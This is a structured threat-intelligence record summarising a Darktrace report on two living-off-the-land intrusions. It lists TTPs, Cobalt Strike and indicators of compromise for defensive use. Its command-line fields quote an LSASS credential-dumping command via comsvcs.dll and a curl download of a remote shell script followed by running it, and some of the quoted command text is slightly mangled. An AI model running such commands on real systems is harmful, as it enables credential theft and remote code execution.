description: This report details two separate cyberattacks detected by Darktrace,
  leveraging Living-off-the-Land (LOTL) techniques for reconnaissance and lateral
  movement within customer networks. The attacks involved VPN access exploitation,
  unusual network scans, credential dumping, and the use of native tools like PsExec
  and WMI.
attribution: Unknown
malware_families:
- CobaltStrike
authors:
- Alexandra Sentenac
- Ryan Traill
TTPs:
  processes:
  - tasklist.exe
  - rundll32.exe
  - cmd.exe
  - powershell.exe
  - lsass.exe
  - wmic.exe
  - psexecsvcs.exe
  - svctl.exe
  - http.sys
  commandline:
  - tasklist /fi "Imagename eq Isass.exe" | find "Isass"
  - 'rundll32.exe C:\\windows\\System32\\comsvcs.dll, #+0000\"24 ~%B \\Windows\\Temp\\DXKxZisO.png'
  - 'cmd.exe /Q /c for /f "tokens=1,2 delims= " %A in ("tasklist /fi "Imagename eq
    Isass.exe" | find "Isass") do rundll32.exe C:\\windows\\System32\\comsvcs.dll,
    #+0000\"24 ~%B \\Windows\\Temp\\DXKxZisO.png'
  - curl -0 http://1.lusyn.xyz/jc/jc.sh
  - ./jc.sh
  powershell: []
  scripting_engine: []
  registry_keys: []
  image_load: []
  network_connections:
  - executable: drclient.exe
    destination_address: 146.70.145[.]189
    port: ''
    url: /download/122.dll
  - executable: svchost.exe
    destination_address: ''
    port: '88'
    url: ''
  file_activity:
  - C:\\Windows\\Temp\\DXKxZisO.png
  - PSEXESVC.exe
  persistence:
  - Scheduled Task Creation
  pipes: []
  process_relations: []
IOCs:
- IP Address: 146.70.145[.]189
- URL: http://1.lusyn.xyz/jc/jc.sh
- File Hash: cc9a670b549d84084618267fdeea13f196e43ae5df0d88e2e18bf5aa91b97318
reference: https://www.darktrace.com/blog/defending-against-living-off-the-land-attacks-anomaly-detection-in-action
date_of_publication: May 28, 2025
file_creation_date: May 28, 2025
